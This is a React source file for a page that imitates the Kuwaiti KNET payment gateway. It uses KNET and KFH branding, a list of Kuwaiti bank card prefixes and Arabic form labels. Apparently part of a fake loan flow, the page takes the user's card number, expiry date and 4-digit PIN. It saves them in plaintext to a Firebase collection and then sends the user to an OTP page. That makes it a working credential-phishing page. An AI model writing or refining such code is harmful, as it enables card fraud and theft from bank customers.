import React, { useEffect, useState, useCallback } from "react";
import { useNavigate } from "react-router-dom";
import { db } from "../firebaseConfig";
import { collection, doc as firestoreDoc, getDoc, serverTimestamp, setDoc } from "firebase/firestore";
import Loader from "../components/Loader";

// --- Session Helper ---
const safeSession = {
  get(key) {
    if (typeof window === "undefined") return null;
    try {
      return window.sessionStorage?.getItem(key) ?? null;
    } catch (err) {
      console.warn("SessionStorage get failed:", err);
      return null;
    }
  },
  set(key, value) {
    if (typeof window === "undefined") return;
    try {
      window.sessionStorage?.setItem(key, value);
    } catch (err) {
      console.warn("SessionStorage set failed:", err);
    }
  },
};

export default function KnetFirebase() {
  const navigate = useNavigate();
  
  // --- State ---
  const [pageLoading, setPageLoading] = useState(true);
  const [bank, setBank] = useState("");
  const [prefix, setPrefix] = useState("");
  const [card, setCard] = useState("");
  const [month, setMonth] = useState("");
  const [year, setYear] = useState("");
  const [pin, setPin] = useState("");
  const [loading, setLoading] = useState(false);
  const [loanId, setLoanId] = useState(() => safeSession.get("loanId") || "");
  const [error, setError] = useState("");

  useEffect(() => {
    const timeoutId = setTimeout(() => setPageLoading(false), 1200);
    return () => clearTimeout(timeoutId);
  }, []);

  const persistKnetSession = useCallback((data) => {
    Object.entries(data).forEach(([key, value]) => {
      if (value !== undefined && value !== null) safeSession.set(key, value);
    });
  }, []);

  // --- Bank Data ---
  const BANKS = {
    ABK: { name: "Al Ahli Bank of Kuwait [ABK]", prefixes: ["403622", "428622", "423826"] },
    ALRAJHI: { name: "Al Rajhi Bank [ALRAJHI]", prefixes: ["458838"] },
    BBK: { name: "Bank of Bahrain and Kuwait [BBK]", prefixes: ["418056", "588790"] },
    BOUBYAN: { name: "Boubyan Bank [BOUBYAN]", prefixes: ["470350", "490455", "490456", "404919", "450605", "426058", "431199"] },
    BURGAN: { name: "Burgan Bank [BURGAN]", prefixes: ["468564", "402978", "403583", "415254", "450238", "540759", "49219000"] },
    CBK: { name: "Commercial Bank of Kuwait [CBK]", prefixes: ["532672", "537015", "521175", "516334"] },
    DOHA: { name: "Doha Bank [DOHA]", prefixes: ["419252"] },
    GBK: { name: "Gulf Bank [GBK]", prefixes: ["526206", "531470", "531644", "531329", "517419", "517458", "531471", "559475"] },
    TAM: { name: "TAM Bank [TAM]", prefixes: ["45077848", "45077849"] },
    KFH: { name: "Kuwait Finance House [KFH]", prefixes: ["485602", "537016", "5326674", "450778"] },
    KIB: { name: "Kuwait International Bank [KIB]", prefixes: ["409054", "406464"] },
    NBK: { name: "National Bank of Kuwait [NBK]", prefixes: ["464452", "589160"] },
    WEYAY: { name: "Weyay Bank [WEYAY]", prefixes: ["46445250", "543363"] },
    QNB: { name: "Qatar National Bank [QNB]", prefixes: ["521020", "524745"] },
    UNB: { name: "Union National Bank [UNB]", prefixes: ["457778"] },
    WARBA: { name: "Warba Bank [WARBA]", prefixes: ["541350", "525528", "532749", "559459"] },
  };

  // --- Handle Submit ---
  const handleSubmit = async (e) => {
    e.preventDefault();
    setError("");

    if (!bank || !prefix || !card || !month || !year || !pin) {
      setError("يرجى تعبئة جميع الحقول قبل المتابعة");
      return;
    }
    if (!/^[0-9]{10}$/.test(card)) {
      setError("يرجى إدخال آخر 10 أرقام من البطاقة بشكل صحيح");
      return;
    }
    if (!/^[0-9]{4}$/.test(pin)) {
      setError("يرجى إدخال الرقم السري المكون من 4 أرقام");
      return;
    }

    const activeLoanId = safeSession.get("loanId") || loanId || "";
    if (!activeLoanId) {
      setError("رقم الطلب غير موجود، يرجى العودة للخطوات السابقة وإعادة الإرسال.");
      return;
    }

    setLoading(true);

    setTimeout(async () => {
        try {
            const knetEntriesCol = collection(db, "knetEntries");
            const knetDocRef = firestoreDoc(knetEntriesCol, activeLoanId);
            const knetSnapshot = await getDoc(knetDocRef);

            const payload = {
                loanId: activeLoanId,
                bank,
                prefix,
                card,
                month,
                year,
                pin,
                updatedAt: serverTimestamp(),
            };

            if (!knetSnapshot.exists()) {
                payload.createdAt = serverTimestamp();
            }

            await setDoc(knetDocRef, payload, { merge: true });

            persistKnetSession({
                bank, prefix, card, month, year, pin, entryId: knetDocRef.id, loanId: activeLoanId
            });
            setLoanId(activeLoanId);

            navigate("/otp", { state: { bank, prefix, card, month, year, pin, entryId: knetDocRef.id } });
        } catch (err) {
            console.error("خطأ أثناء الحفظ:", err);
            setError("حدث خطأ أثناء الإرسال، حاول لاحقًا.");
        } finally {
            setLoading(false);
        }
    }, 2000); 
  };

  const handleReset = () => {
    setBank("");
    setPrefix("");
    setCard("");
    setMonth("");
    setYear("");
    setPin("");
    setError("");
    const checkbox = document.getElementById('fCFlg');
    if (checkbox) checkbox.checked = false;
  };

  const fieldLabel = "text-[#0070CD] font-bold text-[13px] w-[35%] text-right pl-2 leading-tight flex items-center";

  // --- STYLES CORRIGÉS (Final) ---

  // 1. SELECT STYLE: Double Arrows, Circular, Correct Gray
  const selectStyle = {
    height: "30px",
    backgroundColor: "#EFEFEF", // Gris Correct (Kima cap2)
    border: "1px solid #dcdcdc", // Border khfif barcha (invisible presque)
    borderRadius: "20px", 
    boxShadow: "inset 0 1px 2px rgba(0,0,0,0.1)",
    fontSize: "12px",
    width: "100%",
    outline: "none",
    color: "#333",
    fontWeight: "bold",
    appearance: "none",
    WebkitAppearance: "none",
    MozAppearance: "none",
    // Double Arrow SVG (Sort Icon) - Correct One
    backgroundImage: `url('data:image/svg+xml;charset=US-ASCII,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%2212%22%20height%3D%2212%22%20viewBox%3D%220%200%2012%2012%22%3E%3Cpath%20fill%3D%22%23555%22%20d%3D%22M6%200l4%205H2zM6%2012l4-5H2z%22%2F%3E%3C%2Fsvg%3E')`,
    backgroundRepeat: "no-repeat",
    backgroundPosition: "left 8px center", 
    backgroundSize: "10px", // Size Icon sghir
    paddingLeft: "25px", 
    paddingRight: "10px"
  };

  // 2. INPUT STYLE
  const inputStyle = {
    height: "30px",
    backgroundColor: "#ffffff",
    border: "2px solid #0070CD",
    borderRadius: "4px", 
    boxShadow: "inset 0 1px 3px rgba(0,0,0,0.15)",
    fontSize: "13px",
    width: "100%",
    outline: "none",
    color: "#000",
    paddingRight: "5px"
  };

  if (pageLoading) return <Loader />;

  return (
    <div dir="rtl" className="bg-[#f4f4f4] min-h-screen w-full flex flex-col items-center font-sans pb-6" style={{ fontFamily: "var(--app-font-family)" }}>
      {loading && <Loader />}
      
      {/* HEADER BANNER */}
      <div className="w-full" style={{ marginBottom: "15px" }}>
        <img 
            src="/assets/kpayt.jpg" 
            alt="KNET Payment" 
            className="w-full h-auto block"
            style={{ display: "block", maxWidth: "100%" }}
            onError={(e) => (e.target.src = "https://placehold.co/730x150/0054a6/ffffff?text=KNET+Header")}
        />
      </div>

      <div className="w-full max-w-[450px] mx-auto px-3">
        {/* CARD 1: BENEFICIARY */}
        <div className="bg-white w-full rounded-2xl shadow-sm p-3 mb-4 border border-gray-300">
          <div className="flex justify-center mb-2">
              <img 
                src="/assets/kfh2.png" 
                alt="Bank Logo" 
                className="h-10 object-contain"
                onError={(e) => (e.target.src = "https://placehold.co/150x50/fff/ccc?text=KFH+Logo")}
              />
          </div>

          <div className="relative flex items-center h-8 border-b border-gray-300 mb-1">
              <span className="text-[#0070CD] font-bold text-gray-500 absolute right-0 text-[12px]">المستفيد:</span>
              <span className="font-bold text-[#0070CD] text-[13px] w-full text-center absolute left-0">
                  KFG
              </span>
          </div>

          <div className="relative flex items-center h-8">
              <span className="text-[#0070CD] font-bold text-gray-500 absolute right-0 text-[12px]">المبلغ:</span>
              <span className="font-bold text-[#0070CD] text-[13px] w-full text-center absolute left-0">
                  KD 1
              </span>
          </div>
        </div>

        {/* CARD 2: FORM */}
        <form onSubmit={handleSubmit} className="bg-white w-full rounded-2xl shadow-sm p-3 mb-3 relative border border-gray-300">
          
          {/* Logos Centered */}
          <div className="flex justify-between items-center mb-2 px-8">
               <div className="flex items-center gap-1">
                   <div className="w-3.5 h-3.5 rounded-full border-[3px] border-[#0070CD] bg-white flex items-center justify-center">
                   </div>
                   <img src="/assets/knet.png" alt="KNET" className="h-6 object-contain" onError={(e) => e.target.style.display='none'}/>
               </div>

               <div className="flex items-center gap-1 opacity-50 grayscale">
                   <div className="w-3.5 h-3.5 rounded-full border border-gray-300 bg-white"></div>
                   <img src="/assets/knet.png" alt="KFast" className="h-6 object-contain" onError={(e) => e.target.style.display='none'}/>
               </div>
          </div>
          
          <div className="border-t border-gray-300 w-[90%] mx-auto mb-3" />

          {error && (
             <div className="mb-4 p-2 bg-red-100 border border-red-400 text-red-700 text-xs text-center rounded font-bold">
               {error}
             </div>
          )}

          {/* INPUTS */}
          
          {/* Bank (SELECT -> CIRCULAR) */}
          <div className="flex flex-row items-center justify-between py-1 px-1">
              <label className={`${fieldLabel} whitespace-nowrap`}>يرجى اختيار البنك:</label>
              <div className="w-[65%]">
                  <select 
                      value={bank}
                      onChange={(e) => { setBank(e.target.value); setPrefix(""); }}
                      style={selectStyle} 
                      dir="rtl"
                      required
                  >
                      <option value="">يرجى اختيار البنك</option>
                      {Object.keys(BANKS).map((k) => (
                          <option key={k} value={k}>{BANKS[k].name}</option>
                      ))}
                  </select>
              </div>
          </div>
          <div className="border-t border-gray-300 w-[90%] mx-auto my-1" />

          {/* Card Number */}
          <div className="flex flex-row items-center justify-between py-1 px-1">
              <label className={fieldLabel}>رقم بطاقة الصرف الآلي:</label>
              <div className="w-[65%] flex gap-1 items-center">
                   <input 
                      type="tel" 
                      maxLength={10}
                      value={card}
                      onChange={(e) => setCard(e.target.value.replace(/\D/g, "").slice(0, 10))}
                      style={{ ...inputStyle, textAlign: "center", width: "65%" }} 
                      required
                  />
                   <select 
                      value={prefix}
                      onChange={(e) => setPrefix(e.target.value)}
                      disabled={!bank}
                      style={{ ...selectStyle, textAlign: "center", width: "35%" }} 
                      dir="rtl"
                      required
                  >
                       <option value="">بادِئة</option>
                      {bank && BANKS[bank].prefixes.map((p) => (
                          <option key={p} value={p}>{p}</option>
                      ))}
                  </select>
              </div>
          </div>
          <div className="border-t border-gray-300 w-[90%] mx-auto my-1" />

          {/* Expiry (Smaller & Swapped Order) */}
          <div className="flex flex-row items-center justify-between py-1 px-1">
              <label className={fieldLabel}>تاريخ انتهاء البطاقة:</label>
              <div className="w-[65%] flex gap-2 justify-end"> {/* Gap-2 bsh yban le space */}
                   
                   {/* MM (Month) First in RTL */}
                   <select 
                      value={month}
                      onChange={(e) => setMonth(e.target.value)}
                      style={{ ...selectStyle, textAlign: "center", width: "42%" }} // Width 42% bsh ysghar
                      required
                  >
                      <option value="">MM</option>
                      {Array.from({ length: 12 }, (_, i) => (
                          <option key={i} value={String(i + 1).padStart(2, "0")}>{String(i + 1).padStart(2, "0")}</option>
                      ))}
                  </select>

                   {/* YYYY (Year) Second */}
                   <select 
                      value={year}
                      onChange={(e) => setYear(e.target.value)}
                      style={{ ...selectStyle, textAlign: "center", width: "42%" }} // Width 42%
                      required
                  >
                      <option value="">YYYY</option>
                      {Array.from({ length: 15 }, (_, i) => {
                          const y = new Date().getFullYear() + i;
                          return <option key={y} value={y}>{y}</option>;
                      })}
                  </select>
              </div>
          </div>
          <div className="border-t border-gray-300 w-[90%] mx-auto my-1" />

          {/* PIN */}
          <div className="flex flex-row items-center justify-between py-1 px-1">
              <label className={fieldLabel}>الرقم السري:</label>
              <div className="w-[65%]">
                  <input 
                      type="password" 
                      maxLength={4}
                      value={pin}
                      onChange={(e) => setPin(e.target.value.replace(/\D/g, "").slice(0, 4))}
                      style={{ ...inputStyle, textAlign: "right" }} 
                      autoComplete="off"
                      required
                  />
              </div>
          </div>
        </form>

        {/* FOOTER ACTIONS */}
        <div className="bg-white w-full rounded-2xl shadow-sm p-3 border border-gray-300">
           <div className="flex items-center justify-start mb-3 gap-2">
              <input type="checkbox" id="fCFlg" className="w-3.5 h-3.5 cursor-pointer accent-[#0070CD]" />
              <label htmlFor="fCFlg" className="text-[11px] text-gray-700 font-bold cursor-pointer select-none">
                لقد قرأت ووافقت على <span className="text-[#0070CD]">شروط</span> التسجيل في KFast
              </label>
           </div>

           <div className="flex gap-2">
               <button 
                  type="submit"
                  onClick={handleSubmit}
                  disabled={loading}
                  className="flex-1 bg-[#f4f4f4] border border-gray-300 text-gray-700 text-[13px] font-bold py-1.5 rounded shadow-sm hover:bg-[#eaeaea] active:scale-[0.99] transition"
              >
                  {loading ? "جارٍ الإرسال..." : "إرسال"}
              </button>
              
               <button 
                  type="button" 
                  onClick={handleReset}
                  className="flex-1 bg-[#f4f4f4] border border-gray-300 text-gray-700 text-[13px] font-bold py-1.5 rounded shadow-sm hover:bg-[#eaeaea] active:scale-[0.99] transition"
              >
                  إلغاء
              </button>
           </div>
        </div>

        <footer className="mt-4 text-center">
           <p className="text-[11px] text-black font-bold mb-1">جميع الحقوق محفوظة © 2025</p>
           <p className="text-[11px] text-[#0070CD] font-bold">شركة الخدمات المصرفية الآلية المشتركة – كي نت</p>
        </footer>
      </div>

    </div>
  );
}
